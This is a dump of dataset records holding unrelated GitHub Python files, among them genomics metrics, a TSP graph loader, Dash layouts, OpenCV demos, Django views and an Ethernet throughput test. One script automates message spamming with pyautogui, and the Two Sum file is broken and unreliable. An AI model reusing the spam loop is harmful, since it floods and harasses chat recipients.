\n\"\"\"\n\ndistDir1=\"/data1/ghy_data/IMR90/3DResults/NeRV_3D/chr20_5000_0.3.dist\"\nxyzDir=\"/data1/ghy_data/IMR90/3DResults/NeRV-3D-DV/chr20/5000/highresplusnan.xyz\"\nevalfileDir=\"/data1/ghy_data/IMR90/3DResults/NeRV-3D-DV/chr20/5000/evalueCompare_test.txt\"\nhicfilename=\"/home/ghaiyan/project/NeRV-3D/chrtest/test.hic\"\nalpha1=0.3\nevalMetrics(distDir1,xyzDir,evalfileDir,hicfilename,alpha1)\n\n\n\n","repo_name":"ghaiyan/NeRV-3D-DC","sub_path":"src/evalMetrics.py","file_name":"evalMetrics.py","file_ext":"py","file_size_in_byte":5006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73174043686","text":"import logging\n\nimport numpy as np\nimport torch\n\nfrom .base import Transformer\n\n\nclass Affine(Transformer):\n \"\"\" Use an affine transformation function to align the pairs of cells.\n\n The affine function is of the form ``f(x) = Wx + b``, where ``W`` and ``b``\n are the learnable weights. ``W`` has the shape (genes, genes) and ``b``\n (the bias term) has shape (genes,).\n\n Parameters\n ----------\n optim : {'adam', 'sgd'}\n Which torch optimizer to use.\n\n lr : float\n Learning rate to use in gradient descent.\n\n epochs : int\n Number of iterations to run gradient descent.\n \"\"\"\n def __init__(self, optim='adam', lr=1e-3, epochs=1000):\n self.optim = optim\n self.lr = lr\n self.epochs = epochs\n super().__init__()\n\n def fit(self, A, B):\n log = logging.getLogger(__name__)\n d = A.shape[1]\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n log.info(f'Using device {device}')\n A = torch.from_numpy(A).float().to(device)\n B = torch.from_numpy(B).float().to(device)\n f = torch.nn.Sequential()\n f.add_module('lin', torch.nn.Linear(d, d, bias=True))\n f.to(device)\n if self.optim == 'adam':\n optimizer = torch.optim.Adam(f.parameters(), lr=self.lr)\n else:\n optimizer = torch.optim.SGD(f.parameters(), lr=self.lr,\n momentum=0.9, nesterov=True)\n f.train()\n for e in range(self.epochs):\n optimizer.zero_grad()\n loss = torch.mean(torch.norm(f(A) - B, p=2, dim=1)**2)\n if e % 100 == 0:\n log.info(f'\\tEpoch: {e}/{self.epochs}, loss: {loss.item()}')\n loss.backward()\n optimizer.step()\n # theta is the augmented matrix wich includes weights W and bias in\n # a single matrix\n theta = np.zeros((d + 1, d + 1))\n theta[:d, :d] = f[0].weight.data.cpu().numpy()\n theta[:d, -1] = f[0].bias.data.cpu().numpy()\n theta[-1, -1] = 1.\n\n model = {\n 'theta': theta,\n }\n return model\n\n def transform(self, model, A):\n d = A.shape[1]\n W = model['theta'][:d, :d]\n bias = model['theta'][:d, -1]\n return np.dot(W, A.T).T + bias\n\n def chain(self, model, step_model, step_number):\n # Affine functions can be composed easily when represented in their\n # augmented matrix form, simply left multiply their (augmented)\n # transformation matrices by each other.\n if model is None:\n return step_model\n else:\n model['theta'] = np.dot(step_model['theta'],\n model['theta'])\n return model\n\n def finalize(self, model, A_orig, A_final):\n # Since we've been updating the overal model in the chain function,\n # we don't need to do anything here.\n return model\n","repo_name":"AmirAlavi/scipr","sub_path":"scipr/transform/affine.py","file_name":"affine.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"5812760332","text":"import math\nfrom copy import deepcopy\nimport networkx as nx\nimport numpy as np\nimport sys\ninf = 10**10\n\nclass Graph:\n def __init__(self, filename):\n self.filename = filename\n self.load_from_file()\n\n def parse_GEO(self, node):\n i, x, y = node\n i = int(i)\n PI = 3.141592\n deg = int(x)\n min = x - deg\n lat = PI*(deg + 5.0*min/3.0)/180.0\n deg = int(y)\n min = y - deg\n lon = PI*(deg + 5.0*min/3.0)/180.0\n return i, lat, lon\n\n def get_GEO_distance(self, node1, node2):\n i, lat_i, lon_i = node1\n j, lat_j, lon_j = node2\n i, j = int(i)-1, int(j)-1\n R = 6378.388\n q1 = math.cos(lon_i-lon_j)\n q2 = math.cos(lat_i-lat_j)\n q3 = math.cos(lat_i+lat_j)\n d = int(R * math.acos(0.5*((1.0+q1)*q2 - (1.0-q1)*q3)) + 1.0)\n return i, j, d\n\n def get_EUV_2D_distance(self, node1, node2):\n i, x_i, y_i = node1\n j, x_j, y_j = node2\n i, j = int(i)-1, int(j)-1\n xd = x_i-x_j\n yd = y_i-y_j\n d = math.sqrt((xd*xd+yd*yd))\n return i, j, int(d+0.5)\n\n def load_from_file(self):\n nodes_list = []\n params = {}\n with open(self.filename, \"r\") as f:\n line = f.readline()\n while ':' in line:\n key, value = line.split(':')\n params[key] = value.strip()\n line = f.readline()\n line = f.readline()\n while 'EOF' not in line:\n n, x, y = line.strip().split(' ')\n n, x, y = n.strip(), x.strip(), y.strip()\n n, x, y = float(n), float(x), float(y)\n if params['EDGE_WEIGHT_TYPE'] == 'GEO':\n n, x, y = self.parse_GEO((n, x, y))\n nodes_list.append([n, x, y])\n line = f.readline()\n\n dim = int(params['DIMENSION'])\n graph = [[0 for i in range(dim)] for j in range(dim)]\n\n self.city = params['NAME']\n\n if params['EDGE_WEIGHT_TYPE'] == 'EUC_2D':\n dist_func = self.get_EUV_2D_distance\n else:\n dist_func = self.get_GEO_distance\n\n for node1 in nodes_list:\n for node2 in nodes_list:\n i, j, distance = dist_func(node1, node2)\n if i == j:\n distance = inf\n graph[i][j] = distance\n graph[j][i] = distance\n\n graph = np.array(graph)\n self.nxG = nx.from_numpy_matrix(graph)\n for i in range(len(nodes_list)):\n self.nxG.remove_edge(i,i)\n self.G = graph\n\n def copy(self):\n return deepcopy(self.G)\n\n def __repr__(self):\n return repr(self.G)","repo_name":"lzx3x3/Algorithm-CSE6140","sub_path":"Traveling_Sales_Person/Code/helpers/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19381174216","text":"import datetime\r\nimport time\r\nimport pyautogui\r\nimport pyperclip\r\n\r\ntimes_looping = input('times to repeat: ')\r\nmsg = input('msg: ')\r\npyperclip.copy(msg)\r\ntime_to_wait = input('time to wait in seconds: ')\r\n\r\nprint('you got 10 seconds')\r\ntime.sleep(10)\r\n\r\nst = t = time.time()\r\n\r\nfor i in range (int(times_looping)):\r\n pyautogui.hotkey('ctrl', 'v')\r\n pyautogui.press(\"return\")\r\n time.sleep(float(time_to_wait))\r\n\r\net = time.time()\r\n\r\nprint('done')\r\nprint(f\"finished in {str(datetime.timedelta(seconds=(et-st)))}\")\r\nprint(f\"{(int(times_looping)/(et-st))} messages per second\")","repo_name":"noamavned/spammer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"6771462972","text":"# Dash components, html, and dash tables\nimport dash_core_components as dcc\nimport dash_html_components as html\n\nimport plotly.express as px \nimport data\nfrom PIL import Image\n\n\nteamCountryLayout = html.Div([\n html.Div([\n html.H1('Pelaajien kotimaat joukkuettain',\n style={'textAlign':'center'}),\n dcc.Dropdown(id='team',\n options=[\n {\"label\": \"ANA\", \"value\": \"ANA\"},\n {\"label\": \"ARI\", \"value\": \"ARI\"},\n {\"label\": \"BOS\", \"value\": \"BOS\"},\n {\"label\": \"BUF\", \"value\": \"BUF\"},\n {\"label\": \"CAR\", \"value\": \"CAR\"},\n {\"label\": \"CGY\", \"value\": \"CGY\"},\n {\"label\": \"CBJ\", \"value\": \"CBJ\"},\n {\"label\": \"COL\", \"value\": \"COL\"},\n {\"label\": \"DAL\", \"value\": \"DAL\"},\n {\"label\": \"DET\", \"value\": \"DET\"},\n {\"label\": \"EDM\", \"value\": \"EDM\"},\n {\"label\": \"FLA\", \"value\": \"FLA\"},\n {\"label\": \"L.A\", \"value\": \"L.A\"},\n {\"label\": \"MIN\", \"value\": \"MIN\"},\n {\"label\": \"MTL\", \"value\": \"MTL\"},\n {\"label\": \"NSH\", \"value\": \"NSH\"},\n {\"label\": \"N.J\", \"value\": \"N.J\"},\n {\"label\": \"NYI\", \"value\": \"NYI\"},\n {\"label\": \"NYR\", \"value\": \"NYR\"},\n {\"label\": \"OTT\", \"value\": \"OTT\"},\n {\"label\": \"PHI\", \"value\": \"PHI\"},\n {\"label\": \"PIT\", \"value\": \"PIT\"},\n {\"label\": \"S.J\", \"value\": \"S.J\"},\n {\"label\": \"STL\", \"value\": \"STL\"},\n {\"label\": \"T.B\", \"value\": \"T.B\"},\n {\"label\": \"TOR\", \"value\": \"TOR\"},\n {\"label\": \"VAN\", \"value\": \"VAN\"},\n {\"label\": \"VGK\", \"value\": \"VGK\"},\n {\"label\": \"WPG\", \"value\": \"WPG\"},\n {\"label\": \"WSH\", \"value\": \"WSH\"},],\n multi=False,\n value=\"ANA\",\n style={'width': \"40%\"}\n ),\n dcc.Graph(id='map', figure={}),\n \n ]),\n html.Div([\n dcc.Graph(id='pie', figure={})\n ])\n])\n\n\npointsLayout = html.Div([\n html.H1('Kaikkien aikojen pistepörssin top 50',\n style={'textAlign':'center'}),\n\n dcc.Dropdown(id='pointsDropdown',\n options=[\n {\"label\": \"P\", \"value\": \"P\"},\n {\"label\": \"G\", \"value\": \"G\"},\n {\"label\": \"A\", \"value\": \"A\"},\n {\"label\": \"PIM\", \"value\": \"PIM\"},\n {\"label\": \"PPG\", \"value\": \"PPG\"},\n {\"label\": \"SHG\", \"value\": \"SHG\"},\n {\"label\": \"SHOTS\", \"value\": \"SHOTS\"},],\n multi=False,\n value=\"G\",\n style={'width': \"40%\"}\n ),\n dcc.Graph(id='pointsGraph', figure={}),\n dcc.Graph(id='pointsScatter', figure={}),\n \n\n])\n\nteamsLayout = html.Div([\n html.H1('TEAM 1',\n style={'textAlign':'center'}),\n html.H5('X:'),\n dcc.Dropdown(id='teamDropdownX',\n options=[\n {\"label\": \"SF\", \"value\": \"SF\"},\n {\"label\": \"SA\", \"value\": \"SA\"},\n {\"label\": \"GF\", \"value\": \"GF\"},\n {\"label\": \"GA\", \"value\": \"GA\"},\n {\"label\": \"SH%\", \"value\": \"SH%\"},\n {\"label\": \"SV%\", \"value\": \"SV%\"},],\n multi=False,\n value=\"SF\",\n style={'width': \"40%\"}\n ),\n html.H5('Y:'),\n dcc.Dropdown(id='teamDropdownY',\n options=[\n {\"label\": \"SF\", \"value\": \"SF\"},\n {\"label\": \"SA\", \"value\": \"SA\"},\n {\"label\": \"GF\", \"value\": \"GF\"},\n {\"label\": \"GA\", \"value\": \"GA\"},\n {\"label\": \"SH%\", \"value\": \"SH%\"},\n {\"label\": \"SV%\", \"value\": \"SV%\"},],\n multi=False,\n value=\"SA\",\n style={'width': \"40%\"}\n ),\n dcc.Graph(id='teamScatter', figure={}),\n\n \n dcc.Graph(id='teamGFScatter', figure={}),\n html.H5('Kausi:',\n style={'textAlign':'center'}),\n dcc.Slider(\n id='slider',\n step=None,\n min=2016,\n max=2020,\n marks={\n \n 2016: '2016-2017',\n 2017: '2017-2018',\n 2018: '2018-2019',\n 2019: '2019-2020',\n 2020: '2020-2021'\n },\n value=2020,\n ), \n \n\n html.H4('A team’s GF% is their goals-for percentage, representing their share of all goals scored at even-strength. If a team scores three goals and gives up two goals against, they have a goal-for percentage of 60%.But corsica also calculates each team’s expected goals-for percentage, which is the same as above but considers only xG and not actual goals. A team might generate 2.75 xG in a game and surrender 2.25 xG against, giving them an xGF% of 55%.This graph compares actual GF% (reality) and xGF% (expectation) to see how a team is performing relative to what we’d expect.'\n )\n \n \n])","repo_name":"Baasii/Data-Visualization","sub_path":"layouts.py","file_name":"layouts.py","file_ext":"py","file_size_in_byte":6083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2119656642","text":"import cv2\nimport numpy as np\n\n#read image\nimg = cv2.imread(\"./noise.png\")\ncv2.imshow(\"img\",img)\n\ngray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\ncv2.imshow(\"gray\",gray)\n\nfor i in range(0,3):\n eroded = cv2.erode(gray.copy(),None,iterations=i+1)\n cv2.imshow(\"eroded {}\".format(i+1),eroded)\n\nfor i in range(0,3):\n dilate = cv2.dilate(gray.copy(),None,iterations=i+1)\n cv2.imshow(\"dilate {}\".format(i+1),dilate)\n\ncv2.destroyAllWindows()\n\ncv2.imshow(\"gray\",gray)\n\n\nkernelSize = [(3,3),(5,5),(7,7)]\n\nfor k in kernelSize:\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT,k)\n opening = cv2.morphologyEx(gray,cv2.MORPH_OPEN,kernel)\n cv2.imshow(\"opening {}{}\".format(k[0],k[1]),opening)\n\n\nfor k in kernelSize:\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT,k)\n closing = cv2.morphologyEx(gray,cv2.MORPH_CLOSE,kernel)\n cv2.imshow(\"clossing {}{}\".format(k[0],k[1]),closing)\n\nfor k in kernelSize:\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT,k)\n gradient = cv2.morphologyEx(gray,cv2.MORPH_GRADIENT,kernel)\n cv2.imshow(\"gradient {}{}\".format(k[0],k[1]),gradient)\n\n\nk = cv2.waitKey(0) & 0xFF\n\n#pres ESC to exit\nif k==27:\n cv2.destroyAllWindows()\n\n#press 's' to save and exit\nelif k == ord(\"s\"):\n cv2.imwrite(\"newImage.jpg\",img)\n cv2.destroyAllWindows()","repo_name":"girishalwani/OpenCV-Basics","sub_path":"Part_14_morphological/morpho.py","file_name":"morpho.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1818494997","text":"class Solution:\n def binarySearch(item, nums):\n left = 0\n right = len(nums)\n\n while left <= right:\n mid = (left + right) // 2\n if nums[mid] == item:\n return (True, mid)\n else:\n if nums[mid] > item:\n right = mid - 1\n else:\n left = mid + 1\n return False, -1\n\n\n def twoSum(self, nums ,target):\n for i in range(len(nums)):\n first_part = nums[i]\n second_part = target - first_part\n found, index = self.binarySearch(second_part, nums)\n if found and index != i:\n return [i, index]\n\n\n\n\nif __name__ == '__main__':\n alist = input()\n target_sum = int(input())\n two_sum = Solution()\n print(two_sum.twoSum(alist, target_sum))\n\n ten_power1 = 0\n num1 = 0\n while l1.next != None:\n num1 = num1 + (l1.val * (10 ** ten_power1))\n ten_power1 += 1\n l1.next = next\n\n ten_power2 = 0\n num2 = 0\n while l2.next != None:\n num2 = num2 + (l2.val * (10 ** ten_power2))\n ten_power2 += 1\n l2.next = next\n\n return (num1 + num2)","repo_name":"patell11/DataStructuresAndAlgorithms_SanDiego","sub_path":"Practice/Leet_Code/two_sum.py","file_name":"two_sum.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"73482286245","text":"from django.db.models.signals import post_save\nfrom django.contrib.auth.models import User\nfrom django.dispatch import receiver\nfrom .models import Profile,Follow\n\n\nuser = User.objects.filter(username = 'charity').first()\n\n@receiver(post_save,sender=User)\ndef create_profile(sender,instance,created ,**kwargs):\n if created:\n Profile.objects.create(user=instance)\n # make new user follow admin in order to see posts in their timeline\n foll = Follow.objects.create(account = user ,follower= instance)\n foll.save()\n\n\n\n\n@receiver(post_save,sender=User)\ndef save_profile(sender,instance,**kwargs):\n instance.profile.save()\n\n# @receiver(post_save,sender=User)\n# def save_follow(sender,instance,**kwargs):\n# instance.follower.save()\n","repo_name":"charity-bit/Instagram-Clone","sub_path":"instagram/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"37288334835","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.renderers import JSONRenderer\nfrom rest_framework.parsers import JSONParser\nfrom food.models import *\nfrom food.serializers import *\n\n\nclass JSONResponse(HttpResponse):\n\t\"\"\"\n\tAn HttpResponse that renders its content into JSON.\n\t\"\"\"\n\tdef __init__(self, data, **kwargs):\n\t\tcontent = JSONRenderer().render(data)\n\t\tkwargs['content_type'] = 'application/json'\n\t\tsuper(JSONResponse, self).__init__(content, **kwargs)\n\n\n@csrf_exempt\ndef food_list(request):\n\t\"\"\"\n\tList all food, or create a new food.\n\t\"\"\"\n\tif request.method == 'GET':\n\t\tfood = Food.objects.all()\n\t\tserializer = FoodSerializer(food, many=True)\n\t\treturn JSONResponse(serializer.data)\n\n\telif request.method == 'POST':\n\t\tdata = JSONParser().parse(request)\n\t\tserializer = FoodSerializer(data=data)\n\t\tif serializer.is_valid():\n\t\t\tserializer.save()\n\t\t\treturn JSONResponse(serializer.data, status=201)\n\t\treturn JSONResponse(serializer.errors, status=400)\n\n@csrf_exempt\ndef food_detail(request, pk):\n \"\"\"\n Retrieve, update or delete a code food.\n \"\"\"\n try:\n food = Snippet.objects.get(pk=pk)\n except Snippet.DoesNotExist:\n return HttpResponse(status=404)\n\n if request.method == 'GET':\n serializer = FoodSerializer(food)\n return JSONResponse(serializer.data)\n\n elif request.method == 'PUT':\n data = JSONParser().parse(request)\n serializer = FoodSerializer(food, data=data)\n if serializer.is_valid():\n serializer.save()\n return JSONResponse(serializer.data)\n return JSONResponse(serializer.errors, status=400)\n\n elif request.method == 'DELETE':\n food.delete()\n return HttpResponse(status=204)\n\n\n","repo_name":"Bohdan-Anderson/food","sub_path":"application/food/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26789746345","text":"import logging\nimport signal\nimport time\nimport datetime\n# import random\nfrom threading import Thread, Event # , Lock, Condition\nfrom array import array\nimport struct\n\nimport numpy as np\n\nfrom basil.dut import Dut\nfrom basil.HL.RegisterHardwareLayer import RegisterHardwareLayer\n\nconf = '''\nname : test_eth\nversion : 1.0\n\ntransfer_layer:\n - name : ETH\n type : SiTcp\n init:\n ip : \"192.168.10.16\"\n udp_port : 4660\n tcp_port : 24\n tcp_connection : True\n tcp_to_bus : True # if True, use TCP to BUS; if False, UDP (RBCP) to BUS\n\nhw_drivers:\n - name : SITCP_FIFO\n type : sitcp_fifo\n interface : ETH\n\n - name : REGISTERS\n type : test_eth\n interface : ETH\n base_addr : 0x0\n\n'''\n\nstop_thread = False\n\n\nclass test_eth(RegisterHardwareLayer):\n '''Register Hardware Layer.\n\n Implementation of advanced register operations.\n '''\n _registers = {\n 'RESET': {'descr': {'addr': 0, 'size': 8, 'properties': ['writeonly']}},\n 'VERSION': {'descr': {'addr': 0, 'size': 8, 'properties': ['readonly']}},\n 'SETUP': {'default': 0, 'descr': {'addr': 1, 'size': 8, 'offset': 0}},\n 'TEST_DATA': {'descr': {'addr': 2, 'size': 64, 'offset': 0}},\n 'BUS_WRITE_CNT': {'descr': {'addr': 10, 'size': 32, 'offset': 0}},\n 'TCP_WRITE_DLY': {'default': 0, 'descr': {'addr': 14, 'size': 16, 'offset': 0}},\n 'TCP_WRITE_CNT': {'descr': {'addr': 16, 'size': 64, 'offset': 0, 'properties': ['readonly']}},\n 'TCP_FAILED_WRITE_CNT': {'descr': {'addr': 24, 'size': 64, 'offset': 0, 'properties': ['readonly']}},\n 'TCP_RECV_WRITE_CNT': {'descr': {'addr': 32, 'size': 64, 'offset': 0, 'properties': ['readonly']}}\n }\n\n\nclass Test(object):\n def __init__(self):\n self.dut = Dut(conf)\n self.dut.init()\n # fw_version = dut['ETH'].read(0x0000, 1)[0]\n logging.info(\"Firmware version: %s\" % self.dut['REGISTERS'].VERSION)\n\n signal.signal(signal.SIGINT, self.signal_handler)\n logging.info('Press Ctrl-C to stop')\n\n self.stop_thread = Event()\n self.total_tcp_err_cnt = 0\n\n def signal_handler(self, signum, frame):\n logging.info('Pressed Ctrl-C...')\n self.dut['REGISTERS'].TCP_WRITE_DLY = 0 # no TCP data\n self.time_stop = time.time()\n self.stop_thread.set()\n signal.signal(signal.SIGINT, signal.SIG_DFL) # setting default handler\n\n def start(self, test_tcp=True, test_bus=True, tcp_write_delay=6, monitor_interval=1.0, deadline=None):\n if not test_tcp and not test_bus:\n return\n self.test_tcp = test_tcp\n self.test_bus = test_bus\n # reset registers\n self.dut['REGISTERS'].RESET\n # setup register values\n # Monitor\n self.monitor_delay = monitor_interval # Speed of displaying netowrk speed\n # TCP\n self.tcp_readout_delay = 0.1 # Delay between reading TCP buffer\n self.dut['REGISTERS'].TCP_WRITE_DLY = 0 # no TCP data\n self.time_start = time.time()\n self.total_tcp_err_cnt = 0\n self.total_tcp_data_words_read = 0\n self.tcp_exception_cnt = 0\n self.tcp_read_speeds = None\n # BUS\n self.bus_readout_delay = 0.0 # Delay between reading/writing to BUS\n self.total_bus_err_cnt = 0\n self.total_bus_read_write_cnt = 0\n self.bus_exception_cnt = 0\n self.bus_read_write_speeds = None\n # initializing threads\n self.stop_thread.clear()\n self.mon_t = Thread(target=self.monitor, name='Monitor thread', kwargs={})\n self.mon_t.daemon = True\n self.mon_t.start()\n if test_tcp:\n self.tcp_t = Thread(target=self.tcp_read, name='TCP thread', kwargs={})\n self.tcp_t.daemon = True\n self.tcp_t.start()\n if test_bus:\n self.bus_t = Thread(target=self.bus_read_write, name='BUS thread', kwargs={})\n self.bus_t.daemon = True\n self.bus_t.start()\n if test_tcp:\n self.dut['REGISTERS'].TCP_WRITE_DLY = tcp_write_delay # set TCP write delay: 1 equivalent to write data every clock cycle (1/133MHz=0.0075us=7.5ns)\n self.time_start = time.time()\n self.time_stop = self.time_start + 1.0\n # while loop for signal handler\n while not self.stop_thread.wait(0.05):\n if deadline and self.time_start + deadline < time.time():\n self.signal_handler(None, None)\n self.mon_t.join()\n self.mon_t = None\n logging.info(\"Stopped Monitor thread\")\n if test_tcp:\n self.tcp_t.join()\n self.tcp_t = None\n logging.info(\"Stopped TCP thread\")\n if test_bus:\n self.bus_t.join()\n self.bus_t = None\n logging.info(\"Stopped BUS thread\")\n\n # some statistics\n logging.info(\"Total time: %s\" % (str(datetime.timedelta(seconds=self.time_stop - self.time_start))))\n if test_tcp:\n logging.info(\"=== TCP transfer statistics ===\")\n logging.info(\"TCP data error counter: %d\" % self.total_tcp_err_cnt)\n logging.info(\"TCP exception counter: %d\" % self.tcp_exception_cnt)\n logging.info(\"TCP write busy counter: %d\" % self.dut['REGISTERS'].TCP_FAILED_WRITE_CNT)\n logging.info(\"TCP data words: read: %d, expected: %d\" % (self.dut['REGISTERS'].TCP_WRITE_CNT * 4 + self.dut['REGISTERS'].TCP_RECV_WRITE_CNT, self.total_tcp_data_words_read * 4))\n if self.total_tcp_data_words_read * 4 / 10.0**6 > 1000000:\n logging.info(\"Total amount transmitted: %.2f TB\" % (self.total_tcp_data_words_read * 4 / 10.0**12))\n elif self.total_tcp_data_words_read * 4 / 10.0**6 > 1000:\n logging.info(\"Total amount transmitted: %.2f GB\" % (self.total_tcp_data_words_read * 4 / 10.0**9))\n else:\n logging.info(\"Total amount transmitted: %.2f MB\" % (self.total_tcp_data_words_read * 4 / 10.0**6))\n total_tcp_avg_read_speed = self.total_tcp_data_words_read * 32 / (self.time_stop - self.time_start) / 10.0**6\n if total_tcp_avg_read_speed < 1.0:\n logging.info(\"Total average TCP read speed: %.2f kbit/s\" % (total_tcp_avg_read_speed * 10**3))\n else:\n logging.info(\"Total average TCP read speed: %.2f Mbit/s\" % (total_tcp_avg_read_speed))\n if self.tcp_read_speeds:\n if np.average(self.tcp_read_speeds) < 1.0:\n logging.info(\"TCP read speed (min/median/average/max): %.2f/%.2f/%.2f/%.2f kbit/s\" % (np.min(self.tcp_read_speeds) * 10**3, np.median(self.tcp_read_speeds) * 10**3, np.average(self.tcp_read_speeds) * 10**3, np.max(self.tcp_read_speeds) * 10**3))\n else:\n logging.info(\"TCP read speed (min/median/average/max): %.2f/%.2f/%.2f/%.2f Mbit/s\" % (np.min(self.tcp_read_speeds), np.median(self.tcp_read_speeds), np.average(self.tcp_read_speeds), np.max(self.tcp_read_speeds)))\n\n if test_bus:\n logging.info(\"=== BUS transfer statistics ===\")\n logging.info(\"BUS data error counter: %d\" % self.total_bus_err_cnt)\n logging.info(\"BUS exception counter: %d\" % self.bus_exception_cnt)\n logging.info(\"BUS read/write counter: read: %d, expected: %d\" % (self.dut['REGISTERS'].BUS_WRITE_CNT, self.total_bus_read_write_cnt * 8))\n if self.total_bus_read_write_cnt * 8 / 10.0**6 > 1000000:\n logging.info(\"Total amount transmitted: %.2f TB\" % (self.total_bus_read_write_cnt * 8 / 10.0**12))\n elif self.total_bus_read_write_cnt * 8 / 10.0**6 > 1000:\n logging.info(\"Total amount transmitted: %.2f GB\" % (self.total_bus_read_write_cnt * 8 / 10.0**9))\n else:\n logging.info(\"Total amount transmitted: %.2f MB\" % (self.total_bus_read_write_cnt * 8 / 10.0**6))\n total_bus_avg_read_speed = self.total_bus_read_write_cnt * 64 / (self.time_stop - self.time_start) / 10.0**6\n if total_bus_avg_read_speed < 1.0:\n logging.info(\"Total average BUS read/write speed: %.2f kbit/s\" % (total_bus_avg_read_speed * 10**3))\n else:\n logging.info(\"Total average BUS read/write speed: %.2f Mbit/s\" % (total_bus_avg_read_speed))\n if self.bus_read_write_speeds:\n if np.average(self.bus_read_write_speeds) < 1.0:\n logging.info(\"BUS read/write speed (min/median/average/max): %.2f/%.2f/%.2f/%.2f kbit/s\" % (np.min(self.bus_read_write_speeds) * 10**3, np.median(self.bus_read_write_speeds) * 10**3, np.average(self.bus_read_write_speeds) * 10**3, np.max(self.bus_read_write_speeds) * 10**3))\n else:\n logging.info(\"BUS read/write speed (min/median/average/max): %.2f/%.2f/%.2f/%.2f Mbit/s\" % (np.min(self.bus_read_write_speeds), np.median(self.bus_read_write_speeds), np.average(self.bus_read_write_speeds), np.max(self.bus_read_write_speeds)))\n\n # close DUT\n self.dut.close()\n\n def monitor(self):\n logging.info(\"Started Monitor thread\")\n time_read = time.time()\n last_total_tcp_data_words_read = 0\n last_total_bus_read_write_cnt = 0\n while not self.stop_thread.wait(max(0.0, self.monitor_delay - time_read + time.time())):\n tmp_time_read = time.time()\n tmp_total_tcp_data_words_read = self.total_tcp_data_words_read\n tmp_total_bus_read_write_cnt = self.total_bus_read_write_cnt\n if self.test_tcp:\n tcp_read_speed = (tmp_total_tcp_data_words_read - last_total_tcp_data_words_read) * 32 / (tmp_time_read - time_read) / 10**6\n if self.tcp_read_speeds is None: # add on second iteration\n self.tcp_read_speeds = []\n else:\n self.tcp_read_speeds.append(tcp_read_speed)\n if tcp_read_speed < 1.0:\n logging.info(\"TCP read speed: %0.2f kbit/s\" % (tcp_read_speed * 10**3))\n else:\n logging.info(\"TCP read speed: %0.2f Mbit/s\" % tcp_read_speed)\n if self.test_bus:\n bus_read_write_speed = (tmp_total_bus_read_write_cnt - last_total_bus_read_write_cnt) * 64 / (tmp_time_read - time_read) / 10**6\n if self.bus_read_write_speeds is None: # add on second iteration\n self.bus_read_write_speeds = []\n else:\n self.bus_read_write_speeds.append(bus_read_write_speed)\n if bus_read_write_speed < 1.0:\n logging.info(\"BUS read/write speed: %0.2f kbit/s\" % (bus_read_write_speed * 10**3))\n else:\n logging.info(\"BUS read/write speed: %0.2f Mbit/s\" % bus_read_write_speed)\n time_read = tmp_time_read\n last_total_tcp_data_words_read = tmp_total_tcp_data_words_read\n last_total_bus_read_write_cnt = tmp_total_bus_read_write_cnt\n if self.total_bus_err_cnt > 10 or self.total_tcp_err_cnt > 10:\n self.stop_thread.set()\n\n logging.info(\"Stopping Monitor thread...\")\n\n def tcp_read(self):\n logging.info(\"Started TCP thread\")\n fifo_data_last_value = -1\n fifo_was_empty = 0\n time_read = time.time()\n while not self.stop_thread.wait(max(0.0, self.tcp_readout_delay - time_read + time.time())) or fifo_was_empty < 1:\n time_read = time.time()\n try:\n fifo_data = self.dut['SITCP_FIFO'].get_data()\n except Exception as e:\n logging.error(e)\n self.tcp_exception_cnt += 1\n else:\n if fifo_data.shape[0]:\n self.total_tcp_data_words_read += fifo_data.shape[0]\n if fifo_data[0] != fifo_data_last_value + 1:\n logging.warning(\"TCP not increased by 1 between readouts\")\n self.total_tcp_err_cnt += 1\n err_cnt = np.count_nonzero(np.diff(fifo_data) != 1)\n if err_cnt:\n logging.warning(\"TCP data not increased by 1: errors=%d\" % err_cnt)\n self.total_tcp_err_cnt += err_cnt\n fifo_data_last_value = fifo_data[-1]\n elif self.stop_thread.is_set():\n fifo_was_empty += 1\n if self.stop_thread.is_set():\n time.sleep(max(0.0, self.tcp_readout_delay - time_read + time.time()))\n logging.info(\"Stopping TCP thread...\")\n\n def bus_read_write(self):\n logging.info(\"Started BUS thread\")\n time_read = time.time()\n while not self.stop_thread.wait(max(0.0, self.bus_readout_delay - time_read + time.time())):\n time_read = time.time()\n write_value = int(np.random.randint(2**64, size=None, dtype=np.uint64)) # random.randint(0, 2**64 - 1)\n try:\n self.dut['REGISTERS'].TEST_DATA = write_value\n except Exception as e:\n logging.error(e)\n self.bus_exception_cnt += 1\n else:\n try:\n read_value = self.dut['REGISTERS'].TEST_DATA\n except Exception as e:\n logging.error(e)\n self.bus_exception_cnt += 1\n else:\n self.total_bus_read_write_cnt += 1\n if read_value != write_value:\n logging.warning(\"BUS data not correct: read: %s, expected: %s\" % (array('B', struct.unpack(\"BBBBBBBB\", struct.pack(\"Q\", read_value))), array('B', struct.unpack(\"BBBBBBBB\", struct.pack(\"Q\", write_value)))))\n self.total_bus_err_cnt += 1\n logging.info(\"Stopping BUS thread...\")\n\n\nif 